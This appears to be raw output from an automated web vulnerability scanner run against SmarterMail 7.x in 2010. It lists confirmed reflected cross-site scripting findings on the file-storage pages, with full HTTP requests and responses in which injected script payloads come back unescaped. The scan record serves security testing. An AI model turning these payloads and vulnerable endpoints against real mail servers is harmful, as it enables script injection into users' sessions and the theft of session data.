<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x0001B4)</script>
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="0145da44d7014edea0816314f1ea86b8" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'"--><script>netsparker(0x0001B4)</script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">
<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>
<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>
</div>
</div>
<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">
</ul>
</div>
</div>
</div>
</div>
</div>
<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">
</div>
<div class="FooterSummary">
</div>
</div>
<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>
<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}
function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}
function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;
if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }
__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>
<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";
var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';
document.AdditionalResizeEvent = resizePage;
var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}
var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');
if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}
uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=0145da44d7014edea0816314f1ea86b8&pathField='%22--%3e%3cscript%3enetsparker(0x0001B4)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});
uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});
uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});
uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});
uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});
uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});
uploader.bind('UploadProgress', function(up, file) {
isBusy = true;
updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});
uploader.bind('StateChanged', function() {
updateList(false);
});
uploader.init();
};
function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";
$.each(uploader.files, function(i, file) {
inputHTML = '';
if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;
var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);
if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});
fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);
fileList[0].scrollTop = 0;
if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();
if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}
return retVal;
}
function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;
if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;
var actionClass = "";
switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}
if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
|
- /UserControls/Popups/frmAddFileStorageFolder.aspx
/UserControls/Popups/frmAddFileStorageFolder.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| edit | GET | '"--><script>alert(0x00145F)</script> |
Request
GET /UserControls/Popups/frmAddFileStorageFolder.aspx?edit='%22--%3E%3Cscript%3Enetsparker(0x00145F)%3C/script%3E HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Default.aspx?section=UserStorage
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Default.aspx?section=UserStorage
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:09:54 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2734
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="ctl00_head1"><title>
Folder
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Popup/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
<form method="post" action="frmAddFileStorageFolder.aspx?edit='%22--%3e%3cscript%3enetsparker(0x00145F)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjQzNzgwNTYzDxYGHghfX19UaXRsZQUGRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCw9kFgICAQ9kFgJmD2QWAgIBD2QWBGYPZBYCAgEPZBYEZg8QZBAVAQtSb290IEZvbGRlchUBDFJvb3QgRm9sZGVyXBQrAwFnZGQCAg8PFgIfBAULUm9vdCBGb2xkZXJkZAIBDw8WAh8DZ2QWAgIBD2QWAgICDw8WAh8EBSonIi0tPjxzY3JpcHQ+bmV0c3BhcmtlcigweDAwMTQ1Rik8L3NjcmlwdD5kZGTNAEATGfSDfFcX08CBkEvOXkfY/g==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script language="javascript" type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
$(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1'], ['ctl00$BrPH$SaveButton'], [], 90);
//]]>
</script>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<div id="ctl00_MPH_UpdatePanel1">
<table id="ctl00_MPH_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_ddFolders">
<td id="ctl00_MPH_ddFolders_Label" class="Indent Fixed">Parent</td><td id="ctl00_MPH_ddFolders_Setting" class="Setting"><select name="ctl00$MPH$ddFolders_SettingDropDown" id="ctl00_MPH_ddFolders_SettingDropDown">
<option selected="selected" value="Root Folder\">Root Folder</option>
</select></td>
</tr><tr id="ctl00_MPH_lblOldFolderName">
<td id="ctl00_MPH_lblOldFolderName_Label" class="Indent Fixed">Old Name</td><td id="ctl00_MPH_lblOldFolderName_Setting" class="Setting"><span id="ctl00_MPH_lblOldFolderName_ReadOnlyLabel">'"--><script>netsparker(0x00145F)</script></span></td>
</tr><tr id="ctl00_MPH_txtFolderName">
<td id="ctl00_MPH_txtFolderName_Label" class="Indent Fixed">Folder</td><td id="ctl00_MPH_txtFolderName_Setting" class="Setting"><input name="ctl00$MPH$txtFolderName_SettingText" type="text" id="ctl00_MPH_txtFolderName_SettingText" class="text" /></td>
</tr>
</table>
</div>
</div>
<div id="ctl00_Button" class="PopupButtons">
<div class="ButtonBarLeft">
</div>
<div class="ButtonBarRight">
<div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Cancel</span></a></div>
<div id="ctl00_BrPH_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$SaveButton',''); return false;"><span class="BBInner">Save</span></a></div>
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();UpdateSidebarCounts('UserSync', 0);
WebForm_AutoFocus('ctl00_MPH_txtFolderName_SettingText');Sys.Application.initialize();
modules['vmNotBlank_txt']='Must have a value';
modules['vmNoInvalidCharsOrBackslash_txt']='Must not contain / : * ? | < > " \\';
$(function() {$vc({"lt":"Folder","vcID":"ctl00_MPH_txtFolderName_SettingText","VMs":["vmNotBlank","vmNoInvalidCharsOrBackslash"],"VPs":{"vmRequired":true}},true);});
//]]>
</script>
</form>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:09:54 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2734
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="ctl00_head1"><title>
Folder
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Popup/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
<form method="post" action="frmAddFileStorageFolder.aspx?edit='%22--%3e%3cscript%3enetsparker(0x00145F)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjQzNzgwNTYzDxYGHghfX19UaXRsZQUGRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCw9kFgICAQ9kFgJmD2QWAgIBD2QWBGYPZBYCAgEPZBYEZg8QZBAVAQtSb290IEZvbGRlchUBDFJvb3QgRm9sZGVyXBQrAwFnZGQCAg8PFgIfBAULUm9vdCBGb2xkZXJkZAIBDw8WAh8DZ2QWAgIBD2QWAgICDw8WAh8EBSonIi0tPjxzY3JpcHQ+bmV0c3BhcmtlcigweDAwMTQ1Rik8L3NjcmlwdD5kZGTNAEATGfSDfFcX08CBkEvOXkfY/g==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script language="javascript" type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
$(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1'], ['ctl00$BrPH$SaveButton'], [], 90);
//]]>
</script>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<div id="ctl00_MPH_UpdatePanel1">
<table id="ctl00_MPH_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_ddFolders">
<td id="ctl00_MPH_ddFolders_Label" class="Indent Fixed">Parent</td><td id="ctl00_MPH_ddFolders_Setting" class="Setting"><select name="ctl00$MPH$ddFolders_SettingDropDown" id="ctl00_MPH_ddFolders_SettingDropDown">
<option selected="selected" value="Root Folder\">Root Folder</option>
</select></td>
</tr><tr id="ctl00_MPH_lblOldFolderName">
<td id="ctl00_MPH_lblOldFolderName_Label" class="Indent Fixed">Old Name</td><td id="ctl00_MPH_lblOldFolderName_Setting" class="Setting"><span id="ctl00_MPH_lblOldFolderName_ReadOnlyLabel">'"--><script>netsparker(0x00145F)</script></span></td>
</tr><tr id="ctl00_MPH_txtFolderName">
<td id="ctl00_MPH_txtFolderName_Label" class="Indent Fixed">Folder</td><td id="ctl00_MPH_txtFolderName_Setting" class="Setting"><input name="ctl00$MPH$txtFolderName_SettingText" type="text" id="ctl00_MPH_txtFolderName_SettingText" class="text" /></td>
</tr>
</table>
</div>
</div>
<div id="ctl00_Button" class="PopupButtons">
<div class="ButtonBarLeft">
</div>
<div class="ButtonBarRight">
<div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Cancel</span></a></div>
<div id="ctl00_BrPH_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$SaveButton',''); return false;"><span class="BBInner">Save</span></a></div>
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();UpdateSidebarCounts('UserSync', 0);
WebForm_AutoFocus('ctl00_MPH_txtFolderName_SettingText');Sys.Application.initialize();
modules['vmNotBlank_txt']='Must have a value';
modules['vmNoInvalidCharsOrBackslash_txt']='Must not contain / : * ? | < > " \\';
$(function() {$vc({"lt":"Folder","vcID":"ctl00_MPH_txtFolderName_SettingText","VMs":["vmNotBlank","vmNoInvalidCharsOrBackslash"],"VPs":{"vmRequired":true}},true);});
//]]>
</script>
</form>
</body>
</html>
|
- /Main/frmStoredFiles.aspx
/Main/frmStoredFiles.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| path | GET | '"--><script>alert(0x0014AA)</script> |
| __EVENTARGUMENT | POST | 3 |
| __EVENTTARGET | POST | 3 |
| __VIEWSTATE | POST | /wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo= |
| + uploaderId + '_' + inputCount + '_name | POST | plupload.xmlEncode(file.name) |
| + uploaderId + '_' + inputCount + '_status | POST | (file.status == plupload.DONE ? 'done' : 'failed') |
| + uploaderId + '_' + inputCount + '_tmpname | POST | plupload.xmlEncode(file.target_name) |
| ctl00$MPH$domainField | POST | hoytllc.com |
| ctl00$MPH$pathField | POST | Root Folder\ |
| ctl00$MPH$uploadValidationToken | POST | def234bfb6a5429880f5ef74e1fe9c71 |
| ctl00$MPH$userField | POST | dummy |
| ctl00_MPH_FilesGrid_HiddenInput | POST | 3 |
| ctl00_MPH_FilesGrid_HiddenLSR | POST | 3 |
Request
POST /Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Enetsparker(0x0014AA)%3C/script%3E HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 910
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
__EVENTARGUMENT=3&__EVENTTARGET=3&__VIEWSTATE=%2fwEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo%3d&+ uploaderId + '_' + inputCount + '_name=%2b+plupload.xmlEncode(file.name)+%2b&+ uploaderId + '_' + inputCount + '_status=%2b+(file.status+%3d%3d+plupload.DONE+%3f+'done'+%3a+'failed')+%2b&+ uploaderId + '_' + inputCount + '_tmpname=%2b+plupload.xmlEncode(file.target_name)+%2b&ctl00$MPH$domainField=hoytllc.com&ctl00$MPH$pathField=Root+Folder%5c&ctl00$MPH$uploadValidationToken=def234bfb6a5429880f5ef74e1fe9c71&ctl00$MPH$userField=dummy&ctl00_MPH_FilesGrid_HiddenInput=3&ctl00_MPH_FilesGrid_HiddenLSR=3
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
